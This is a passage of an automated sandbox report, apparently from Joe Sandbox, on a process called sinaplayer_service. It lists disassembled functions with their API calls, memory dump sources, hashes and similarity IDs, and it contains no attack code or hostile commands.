                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00381A65
                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00381A7F
                                                                                                                                                                                                    • CoCreateInstance.OLE32(003A33C8,00000000,00000001,003A32F8,?), ref: 00381AC2
                                                                                                                                                                                                      • Part of subcall function 00371DA0: memmove.MSVCR120(?,?,00000001), ref: 00371DCA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,003AC120,00000000,000000FF), ref: 00382256
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,003AC120,00000000,000000FF), ref: 00382286
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$BasicPiece@StringU?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$Base64CreateD@2@@std@@D@2@@std@@@D@2@@std@@@1@D@2@@std@@@1@@Encode@base@@F8@base@@InitializeInstanceSecurityW@2@@3@@W@2@@std@@WideWide@base@@__onexitmemmove
                                                                                                                                                                                                    • String ID: ROOT\CIMV2$WQL$h9$h9
                                                                                                                                                                                                    • API String ID: 3807948138-1704756073
                                                                                                                                                                                                    • Opcode ID: cfba5866a9428b9ffc222074c89d72a4c235e021a750f1c4ce16d11a30b3ad1e
                                                                                                                                                                                                    • Instruction ID: ff75d2577a22a37bd41be1d3301e0580de77c0d462d67508d3b7c4645558c8b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfba5866a9428b9ffc222074c89d72a4c235e021a750f1c4ce16d11a30b3ad1e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23529DB09002289BDF62EB24CC45BDEB7B9BF44314F1001E9E60DAB291DB756E89CF55
                                                                                                                                                                                                    Function 6C578D59 Relevance: 40.8, APIs: 27, Instructions: 275stringtimeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D7E
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • __tzname.MSVCR120(6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D87
                                                                                                                                                                                                    • _get_timezone.MSVCR120(0000003B,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D93
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DA5
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DB7
                                                                                                                                                                                                    • ___lc_codepage_func.MSVCR120(6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DC5
                                                                                                                                                                                                      • Part of subcall function 6C567060: strlen.MSVCR120(00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000), ref: 6C56707C
                                                                                                                                                                                                      • Part of subcall function 6C567060: strlen.MSVCR120(00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000), ref: 6C56708B
                                                                                                                                                                                                      • Part of subcall function 6C567060: _mbsnbicoll.MSVCR120(00000000,00000000,00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190), ref: 6C5670A7
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(6C630C00,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578E0B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6C630C04,000000FF,6C5A4437,0000003F,00000000,?), ref: 6C578E84
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6C630C58,000000FF,1CC48320,0000003F,00000000,?), ref: 6C578EBC
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6C578EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6C578EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6C578EF7
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66C8
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A6709
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?), ref: 6C5A670F
                                                                                                                                                                                                    • strncpy_s.MSVCR120(6C5A4437,00000040,00000000,00000003), ref: 6C5A672A
                                                                                                                                                                                                    • atol.MSVCR120(-00000003), ref: 6C5A6747
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 427740661-0
                                                                                                                                                                                                    • Opcode ID: 39e248c0bae3803f64e8228eee2755e7b6d57afb574482120c9e3ffb53f96a93
                                                                                                                                                                                                    • Instruction ID: 8466c6f828b1292217bea69c0d158980230f99c960d43a26f1162b56d2d64105
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39e248c0bae3803f64e8228eee2755e7b6d57afb574482120c9e3ffb53f96a93
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34A18071D14345DEDB15CFAACD80A9DBBB8AF46318F14101AE414FBA90DB349C86CB65
                                                                                                                                                                                                    Function 6C574FC6 Relevance: 25.9, APIs: 17, Instructions: 443COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C575D05: __EH_prolog3.LIBCMT ref: 6C575D0C
                                                                                                                                                                                                      • Part of subcall function 6C575D05: ??2@YAPAXI@Z.MSVCR120(00000090,0000000C,6C57500E,76A191BC,?,00000180,?), ref: 6C575D35
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(76A191BC,?,00000180,?), ref: 6C575027
                                                                                                                                                                                                      • Part of subcall function 6C5744E0: __EH_prolog3.LIBCMT ref: 6C5744E7
                                                                                                                                                                                                      • Part of subcall function 6C5744FF: GetNumaHighestNodeNumber.KERNEL32(?,?,6C575034,76A191BC,?,00000180,?), ref: 6C574509
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,76A191BC,?,00000180,?), ref: 6C575059
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C5750A3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C5750BB
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?), ref: 6C5750D1
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000180,?), ref: 6C5750E4
                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 6C575160
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(000000C0), ref: 6C575250
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000088,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6C5752EB
                                                                                                                                                                                                      • Part of subcall function 6C574F63: ??2@YAPAXI@Z.MSVCR120(0000000C,?,00000000,00000000,00000000,00000000,?,6C5753A3,?,?,?,?,?,?,?,00000000), ref: 6C574F88
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6C5753E5
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000180,?), ref: 6C57542F
                                                                                                                                                                                                    • __crtCreateSemaphoreExW.MSVCR120(00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,?,?,?,?,00000180,?), ref: 6C5754A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3NodeQuickmemset$Concurrency::details::Concurrency@@Count@CreateHighestNumaNumberProcessorSemaphoreSet::__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1225761749-0
                                                                                                                                                                                                    • Opcode ID: 5331614fda895eed7b3c4fd3e6f4ad6a780e4131b8890ae0eacf3b3b73ea953b
                                                                                                                                                                                                    • Instruction ID: aa6bb9b849a1b99147e25f2d2209ab887ed305de410561461d6f48ef6b6c64d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5331614fda895eed7b3c4fd3e6f4ad6a780e4131b8890ae0eacf3b3b73ea953b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87025A71604701EFD764CF28C884A9ABBE4FF88314F504A2EE59A87B50DB30E855CFA1
                                                                                                                                                                                                    Function 00381660 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 144fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00381754
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00170002,01010101,00000004,?,00000008,?,00000000), ref: 00381791
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003817DE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                    • String ID: #{ad498944-762f-11d0-8dcb-00c04fc3358c}$%02X$\\.\
                                                                                                                                                                                                    • API String ID: 33631002-1280425602
                                                                                                                                                                                                    • Opcode ID: 6eb9a22bab4148c38ddb6ec3bed26ffbb636d0819b474b71e6dacff1543d8193
                                                                                                                                                                                                    • Instruction ID: 34d3f95e964ab94e933d71a1f6cabbabfb2ab72624ba6ca3348cbf349814f16b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eb9a22bab4148c38ddb6ec3bed26ffbb636d0819b474b71e6dacff1543d8193
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A041E871A403189BDF26EF64DC85BEA73BCEF54310F5501D9E94AA7180EA30AE468B90
                                                                                                                                                                                                    Function 003860A0 Relevance: 10.6, APIs: 7, Instructions: 84memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 003860EF
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0038612C
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00386142
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00386156
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00000194,?,00000000,00000000), ref: 00386173
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00386194
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003861B7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersGlobalInfo$??3@AllocFreememcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1237750234-0
                                                                                                                                                                                                    • Opcode ID: c1916acb843c502205faddac7d0c5d9cd24d74a5773aaa365e365ce260553ecd
                                                                                                                                                                                                    • Instruction ID: 6a433b8fd4eab871ebba29361a9585e7c0e8d0680f41c6b648819e7b9ff5e035
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1916acb843c502205faddac7d0c5d9cd24d74a5773aaa365e365ce260553ecd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31B7B190061DABDF22DB64CC45BDEB7B8EB44714F4001E9F609A7281DB749A88CF94
                                                                                                                                                                                                    Function 6C56CADD Relevance: 9.1, APIs: 6, Instructions: 100COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4166
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4170
                                                                                                                                                                                                    • _errno.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A417C
                                                                                                                                                                                                    • _errno.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A4186
                                                                                                                                                                                                    • _errno.MSVCR120(0000000A,759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A41AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(759206A0,?,00000000,?,6C56CBBA,00000010,?,00000000,0000000A,00000000), ref: 6C5A41B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction ID: d4ad73b3e5a82e1d966532f5ff2fa71af9bb95bbd5451df479c0e8725c871488
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31BC35741306DBDB04DFBACC8169F77A6EF99714F204426E814CBA70EB30D8528796
                                                                                                                                                                                                    Function 0038F510 Relevance: 7.6, APIs: 5, Instructions: 57registrysynchronizationpipeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000001,00000000,6C6C56E0,0038B65F), ref: 0038F52A
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0038F53F
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,0038F3C0,?,000000FF,00000004), ref: 0038F55E
                                                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(?,40080003,00000006,00000001,00000040,00000040,00000000,00000008,?,000000FF,00000004), ref: 0038F586
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,000000FF,00000004), ref: 0038F59A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$Event$MutexNamedObjectPipeRegisterSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 503818757-0
                                                                                                                                                                                                    • Opcode ID: 88f4cca1b0e16916822d91a480ece0a22cde20e0eba2bf07c92951b317ca419e
                                                                                                                                                                                                    • Instruction ID: 08351c396c806a95bc3f059398f38303a9909ced399b94c39c9fce2891df8c44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88f4cca1b0e16916822d91a480ece0a22cde20e0eba2bf07c92951b317ca419e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50111270640710BFEB72AF35DC4AF8276E87B01B10F100A69F756E65D0DBB1E4558B54
                                                                                                                                                                                                    Function 003766C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003766EF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(6C6C56E0,00000000), ref: 0037670A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,6C6C56E0,00000000), ref: 0037673D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID: Vll
                                                                                                                                                                                                    • API String ID: 3025939394-3458357932
                                                                                                                                                                                                    • Opcode ID: a1d0f64ac22e265ee381d8d129f16a7ca827d78e611c8ef37ce9091c9ffdd89f
                                                                                                                                                                                                    • Instruction ID: 09849cd72d48c8c17686300e2578865a8df8e52617fab9ff889052781ec861d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d0f64ac22e265ee381d8d129f16a7ca827d78e611c8ef37ce9091c9ffdd89f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C51182B5914754DFCB21CF58D941B9ABBF8FB09720F10865AEC26D7790D774A900CB90
                                                                                                                                                                                                    Function 00387A30 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 00387A5F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387A7A
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 00387A9E
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387ABD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedFilePath@base@@SafeStateThreadV01@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 648099966-0
                                                                                                                                                                                                    • Opcode ID: 201cddc7f258cd4d89bbd5e5ade8bffd6ba965af21039cd8d4235a5ddd9cda1c
                                                                                                                                                                                                    • Instruction ID: 0c5f7b7c0eeb12c031b251d0dc24043705051f003c8b0c4cfd671f482a339d40
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201cddc7f258cd4d89bbd5e5ade8bffd6ba965af21039cd8d4235a5ddd9cda1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511EFB5904718DFCB11CF58C905B9ABBF8FB08720F10465AEC2697790D775AA04CF90
                                                                                                                                                                                                    Function 00387830 Relevance: 6.1, APIs: 4, Instructions: 51threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018), ref: 0038785F
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,000000FF), ref: 0038787A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387896
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,000000FF), ref: 003878BB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
